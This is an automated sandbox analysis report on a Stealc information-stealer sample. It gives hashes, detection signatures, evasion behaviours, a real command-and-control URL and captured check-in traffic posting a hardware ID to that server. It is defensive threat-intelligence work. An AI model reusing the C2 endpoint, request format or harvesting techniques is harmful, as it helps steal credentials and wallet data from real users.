Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562132
MD5:195eafa20236c52b744d7ff88ccf8dd6
SHA1:eb079dc207806442f57ef816f42f8b0a1835aa46
SHA256:110760d0807d24cda6139d69aee2e1166753ad3ee33e4f9751f3c036903838b4
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 195EAFA20236C52B744D7FF88CCF8DD6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7468JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7468JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-25T08:44:20.873510+010020442431Malware Command and Control Activity Detected192.168.2.749710185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.phpftAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpv9Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/d9Avira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.7468.1.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E44C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00E44C50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E460D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00E460D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E640B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00E640B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E56960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_00E56960
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E4EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,1_2_00E4EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E49B80 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00E49B80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E56B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_00E56B79
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E49B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00E49B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E47750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00E47750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E518A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E53910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E53910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E51269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E51269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E51250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E51250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E5E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E5CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00E523A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E4DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E4DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E52390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_00E52390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E4DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E4DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E54B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00E54B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E54B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E54B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_00E5DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E5D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E416A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00E416B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49710 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 35 33 45 39 37 38 46 41 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 2d 2d 0d 0a Data Ascii: ------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="hwid"2553E978FAD72284582127------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="build"mars------IJECAEHJJJKJKFIDGCBG--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E46C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,1_2_00E46C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 35 33 45 39 37 38 46 41 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 2d 2d 0d 0a Data Ascii: ------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="hwid"2553E978FAD72284582127------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="build"mars------IJECAEHJJJKJKFIDGCBG--
              Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/H
              Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
              Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpF
              Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
              Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpft
              Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv9
              Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/d9
              Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E49770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,1_2_00E49770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D1_2_0120911D
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E648B01_2_00E648B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120C8AC1_2_0120C8AC
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012460971_2_01246097
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011300F71_2_011300F7
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01202B2C1_2_01202B2C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120ABA11_2_0120ABA1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011FD3C11_2_011FD3C1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011DBA501_2_011DBA50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01168AE91_2_01168AE9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010F4D901_2_010F4D90
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012075EC1_2_012075EC
